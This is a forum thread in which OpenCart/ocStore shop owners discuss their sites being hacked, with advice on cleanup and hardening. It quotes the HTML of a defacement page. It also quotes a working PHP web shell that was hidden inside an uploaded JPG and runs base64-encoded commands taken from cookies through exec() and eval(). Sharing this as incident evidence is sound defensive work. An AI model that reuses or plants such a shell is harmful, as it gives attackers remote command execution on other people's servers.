Срочно! Взлом или баран?

[Einshtein]

Вчера все было нормально, сегодня вижу в админке вот такое...

на пользовательской части вот такое:

Сейчас свяжусь с хостингом...бекапы как на зло 2х недельной давности, ПОделитесь идеями в дальнейших действиях!

Спасибо!

Ps забыл сказать что сайт работает на ocstore 1.5.1.3 (tmz.com.ua)

[Einshtein]

Дал запрос хостеру (avahost.ua), благо у них вчерашний бекап остался...Надеюсь всё обойдётся. Но защитой ихней я крайне удивлен...при выборе хостинга акцент делал на тех поддержке и защите...поддержка нормальная, а вот с защитой уже косяк вышел :(

в описание категории они втулили вот такой код:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9">
<title>Hacked 1923Turk Grup - Emre5807 - Українці про підготовку необгрунтованими відео. Отримайте ваші ноги падає!</title>
<style type="text/css">
<!--
body {
background-color: #000000;
}
.style1 {
font-size: 16px;
font-weight: bold;
color: #FFFFFF;
font-family: Verdana, Arial, Helvetica, sans-serif;
}
.style2 {color: #FF0000}
.style3 {
color: #FFFFFF;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 14px;
font-weight: bold;
}
.style4 {font-size: 12px}
-->
</style></head>
<body>
<div align="center">
  <pre><img src="http://a1211.hizliresim.com/13/y/gf071.jpg" width="700" height="392" border="0">
<span class="style1">'' Ukrainians about preparing unfounded video. Get your foot falls! ''<br>'' <span class="style2">Hakkımızda asılsız video hazırlayan ukraynalılar. Ayağınızı denk alın!</span> ''<br>'' Українці про підготовку необгрунтованими відео. Отримайте ваші ноги падає! ''</span></pre>
	<tr>
		<td colspan="2">
			<img src="http://img25.imageshack.us/img25/6790/ozkuv05.gif" width="890" height="88" alt=""></td>
	</tr>
  <font size="5"
<div align="center"><font face="Book Antiqua"><strong>
<HR color=red SIZE=3>
  <font color="#F25951"> 1923Turk-Grup | Emre5807  </font>
<embed src="http://www.kurtlarvadisigladio.com/soundtrack.swf" width="0" height="0" loop="true" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"><br />
</body>
</html>

Только сейчас заметил что с площадки которую мы используем под несколько сайтов исчез полностью каталог с сайтом наших брендовых навигаторов и не открывается субдомен с другим сайтом.

Короче я домтрубашатал этих турков мать их

Официальный сайт этих рицидивистов

http://1923turk.com/

Вдруг кому понадобится

[ZyXeL]

Так что с защитой? Хакнули другой сайт на серваке или дырка в опенкарте?

[Einshtein]

судя по всему хакнули площадку на хосте (незнаю по фтп или както иначе как там хеккеры хакают). Суть в том что 2 сайта вообще удалили (правда бд оставили на месте), а на Опенкарте удалили все категории и создали свою с угрозами. Судя по всему до ОС они добрались через бд, так как невозможно удалить категории не отвязав от них товары, а товары все остались нетронутые.

Вчера хостер восстанавливал пол дня, так как сайт занимает 14гб то процесс затянулся, и под конец востановления резервной копии постоянно происходил какойто сбой. В итоге БД они востановили, а бекап просто залили в отдельную папку мне на прощадке и я ручками востанавливал все файлы до полуночи...

Короче я зол и истощен...а ещё мстителен и злопамятен...

[Einshtein]

кстати пока на сайте небыло категорий - сайт летал как угорелый. Может в связи с этим есть какиенить идеи? сейчас оформлю отдельную тему

[vikingshop]

Дык писали уже вроде 1.5.1.3 дырявый же...

[Bigbrother72]

присоединюсь к теме.

ocStore Version 1.5.3.1

сегодня обнаружил в папке download 2 файла

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49

и index.html

в index.html ничего вроде страшного.

а вот jpg сначала идете картинка, а потом код:

<?php
	echo "$#@&nn";

	if(isset($_COOKIE['76027405']) && !empty($_COOKIE['76027405'])) {
		echo htmlentities((string) base64_decode($_COOKIE['76027405']),ENT_QUOTES);
		echo "<pre>";
		$outbuf="";$outstr="";exec(base64_decode($_COOKIE['76027405']),$outbuf);foreach($outbuf as $val) $outstr.=$val."rn";echo htmlentities($outstr);
	} elseif(isset($_COOKIE['26312595']) && !empty($_COOKIE['26312595'])) {
		echo htmlentities((string) base64_decode($_COOKIE['26312595']),ENT_QUOTES);
		echo "<pre>"; 
		eval((string) base64_decode($_COOKIE['26312595']));
	} elseif(isset($_COOKIE['13037085'])) {
		phpinfo();
	}

?>

вроде остальные файлы не затронуты.

взломали или попытка взлома?

[freelancer]

взломали или попытка взлома?

попытка взлома через известную уязвимость. наберите в адресной строке домен/download/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49

[Bigbrother72]

попытка взлома через известную уязвимость. наберите в адресной строке домен/download/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49

набрал - показывается jpg

может удалить папку download? она вообще нужна?

[autograph]

набрал - показывается jpg

может удалить папку download? она вообще нужна?

настройте файл .htaccess

[EVMedvedev]

PHP код в файле изображения это код для взлома. Ищите срочно последствия его действий. Если вставят какой нибудь редирект на порносайт для мобильных устройств например, то через несколько месяцев такой работы ваш сайт может вылететь из индекса яндекса полностью. Яша воспримет ваш сайт как торговца рекламой и опустит в выдаче по самые некуда. Придется переезжать на другой домен. Проверяйте htaccess, index.php во фронте и в админке. Обращайте внимание на дополнительные инклуды в начале и конце файлов. Ищите фрагменты кода, закрытые обфускатом. Если обнаружили это в папке загрузки, все нужно удалять и проверять, как туда могли закинуть файл. Возможно это обусловлено настройками OC.

Да. Еще любопытства ради выведите на печать ту строку, которая передается на eval. Она у вас сидит в куках и она туда как то попала. Вопрос как?

[Bigbrother72]

Вчера на двух сайтах опять в папке download появились файлы:

типа

route.php.jpg.4cbd766fa1992fd76fc6858c8cb1e757

в папке download лежит .htaccess такого содержания.

<Files *.*>

Order Deny,Allow

Deny from all

</Files>

как еще бороться?

[freelancer]

попытка взлома через известную уязвимость. наберите в адресной строке домен/download/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49

суть в том, что если отображается картинка - взлом не прокатил

[freelancer]

ну и совет продавцам, у которых опций в виде файла удалите метод upload из catalog/controller/product/product.php

Змінено 26 березня 2013 користувачем freelancer

[Bigbrother72]

суть в том, что если отображается картинка - взлом не прокатил

первый раз когда увидел файл (aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.34fc0eb3c2764ad25f7547f5505a8b49) в декабре отображалась картинка.

сегодня site.com/download/route.php.jpg.4cbd766fa1992fd76fc6858c8cb1e757 - выдает страница не найдена.

[afwollis]

если файл на месте, а вместо "картинки" получаете 404 (страница не найдена), скорее всего изменились настройки сервера. в худшую для вас сторону.

файлы с расширениями изображений должны отдаваться сервером только как изображения.